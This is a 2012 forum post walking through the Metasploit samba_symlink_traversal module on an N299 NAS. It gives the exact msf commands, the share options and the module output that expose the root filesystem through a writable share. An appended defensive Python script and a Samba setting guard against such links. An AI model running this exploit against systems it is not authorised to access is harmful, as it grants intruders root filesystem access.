General NAS-Central Forums

PostPosted: Sat Oct 06, 2012 9:15 am 

NOTE: Because the Video folder is scanned by the Media Server, you must stop it from the NAS menu before this exploit.
In order to access the root filesystem of the N299 we will use Linux BackTrack.

Launch a terminal window and from the terminal we run
After some loading the prompt will be msf >.
At this prompt we type search samba and we will have a list with available exploits:

msf > search samba

The command will list all available exploits.
Load the first one with the command:
msf > use auxiliary/admin/smb/samba_symlink_traversal

Let's see what the options are:
msf  auxiliary(samba_symlink_traversal) > show options
Module options (auxiliary/admin/smb/samba_symlink_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST                       yes       The target address
   RPORT      445              yes       Set the SMB service port
   SMBSHARE                    yes       The name of a writeable share on the server
   SMBTARGET  rootfs           yes       The name of the directory that should point to the root filesystem

Let's set the options:

msf  auxiliary(samba_symlink_traversal) > set RHOST (change the IP address with your own NAS IP address)
msf  auxiliary(samba_symlink_traversal) > set SMBSHARE Video (I set the Video folder from the NAS menu to be writable for everyone)
msf  auxiliary(samba_symlink_traversal) > set RPORT 139
msf  auxiliary(samba_symlink_traversal) > set SMBTARGET roothack (the folder where the root directory will be mounted in the Video folder)

Now we run the command exploit:
msf  auxiliary(samba_symlink_traversal) > exploit

Connecting to the server...
Trying to mount writeable share 'Video'...
Trying to link 'roothack' to the root filesystem...
Now access the following share to browse the root filesystem: \\Video\roothack\
Auxiliary module execution completed

Now if you go to the network folder Video you will see a folder roothack with all the files of the root filesystem.
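
For the device owner, a check for the kind of link this post creates, as an added example that is not part of the original post: the Python script below walks a share directory on the NAS and reports symlinks that resolve outside it. The function names and the sample share are constructed for illustration.

```python
import os
import tempfile


def find_escaping_symlinks(share_root):
    """Return sorted relative paths of symlinks under share_root whose
    resolved target lies outside share_root."""
    root = os.path.realpath(share_root)
    escaping = []
    # followlinks=False: links are listed but never descended into
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            target = os.path.realpath(path)
            # commonpath equals root only when target is root or below it
            if os.path.commonpath([root, target]) != root:
                escaping.append(os.path.relpath(path, root))
    return sorted(escaping)


def build_sample_share():
    """Constructed sample: a share holding one harmless link and one
    link to the filesystem root, like the 'roothack' entry in the post."""
    share = tempfile.mkdtemp(prefix="Video_")
    os.mkdir(os.path.join(share, "movies"))
    with open(os.path.join(share, "movies", "a.avi"), "w") as fh:
        fh.write("sample")
    # Link that stays inside the share
    os.symlink(os.path.join(share, "movies"), os.path.join(share, "latest"))
    # Link that leaves the share
    os.symlink("/", os.path.join(share, "roothack"))
    return share


if __name__ == "__main__":
    share = build_sample_share()
    for link in find_escaping_symlinks(share):
        full = os.path.join(share, link)
        print("symlink leaves share:", link, "->", os.readlink(full))
```

Run it on the NAS (or against a mounted copy of its disk) with the real share path passed to find_escaping_symlinks. Samba's `wide links = no` share setting stops the server from following links that leave the share.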
